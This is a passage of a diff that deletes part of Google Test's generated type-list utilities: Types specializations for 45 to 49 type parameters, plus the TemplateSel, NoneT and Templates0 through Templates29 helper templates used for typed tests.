-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44, T45,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types45<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44, T45,
-    T46, internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types46<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45, T46> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44, T45,
-    T46, T47, internal::None, internal::None, internal::None> {
-  typedef internal::Types47<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45, T46, T47> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44, T45,
-    T46, T47, T48, internal::None, internal::None> {
-  typedef internal::Types48<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45, T46, T47, T48> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44, T45,
-    T46, T47, T48, T49, internal::None> {
-  typedef internal::Types49<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45, T46, T47, T48, T49> type;
-};
-
-namespace internal {
-
-# define GTEST_TEMPLATE_ template <typename T> class
-
-// The template "selector" struct TemplateSel<Tmpl> is used to
-// represent Tmpl, which must be a class template with one type
-// parameter, as a type.  TemplateSel<Tmpl>::Bind<T>::type is defined
-// as the type Tmpl<T>.  This allows us to actually instantiate the
-// template "selected" by TemplateSel<Tmpl>.
-//
-// This trick is necessary for simulating typedef for class templates,
-// which C++ doesn't support directly.
-template <GTEST_TEMPLATE_ Tmpl>
-struct TemplateSel {
-  template <typename T>
-  struct Bind {
-    typedef Tmpl<T> type;
-  };
-};
-
-# define GTEST_BIND_(TmplSel, T) \
-  TmplSel::template Bind<T>::type
-
-// A unique struct template used as the default value for the
-// arguments of class template Templates.  This allows us to simulate
-// variadic templates (e.g. Templates<int>, Templates<int, double>,
-// and etc), which C++ doesn't support directly.
-template <typename T>
-struct NoneT {};
-
-// The following family of struct and struct templates are used to
-// represent template lists.  In particular, TemplatesN<T1, T2, ...,
-// TN> represents a list of N templates (T1, T2, ..., and TN).  Except
-// for Templates0, every struct in the family has two member types:
-// Head for the selector of the first template in the list, and Tail
-// for the rest of the list.
-
-// The empty template list.
-struct Templates0 {};
-
-// Template lists of length 1, 2, 3, and so on.
-
-template <GTEST_TEMPLATE_ T1>
-struct Templates1 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates0 Tail;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2>
-struct Templates2 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates1<T2> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3>
-struct Templates3 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates2<T2, T3> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4>
-struct Templates4 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates3<T2, T3, T4> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5>
-struct Templates5 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates4<T2, T3, T4, T5> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6>
-struct Templates6 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates5<T2, T3, T4, T5, T6> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7>
-struct Templates7 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates6<T2, T3, T4, T5, T6, T7> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8>
-struct Templates8 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates7<T2, T3, T4, T5, T6, T7, T8> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9>
-struct Templates9 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates8<T2, T3, T4, T5, T6, T7, T8, T9> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10>
-struct Templates10 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates9<T2, T3, T4, T5, T6, T7, T8, T9, T10> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11>
-struct Templates11 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates10<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12>
-struct Templates12 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates11<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13>
-struct Templates13 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates12<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14>
-struct Templates14 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates13<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15>
-struct Templates15 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates14<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16>
-struct Templates16 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates15<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17>
-struct Templates17 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates16<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18>
-struct Templates18 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates17<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19>
-struct Templates19 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates18<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20>
-struct Templates20 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates19<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21>
-struct Templates21 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates20<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22>
-struct Templates22 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates21<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23>
-struct Templates23 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates22<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24>
-struct Templates24 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates23<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25>
-struct Templates25 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates24<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26>
-struct Templates26 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates25<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27>
-struct Templates27 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates26<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28>
-struct Templates28 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates27<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29>
-struct Templates29 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates28<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30>
-struct Templates30 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates29<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
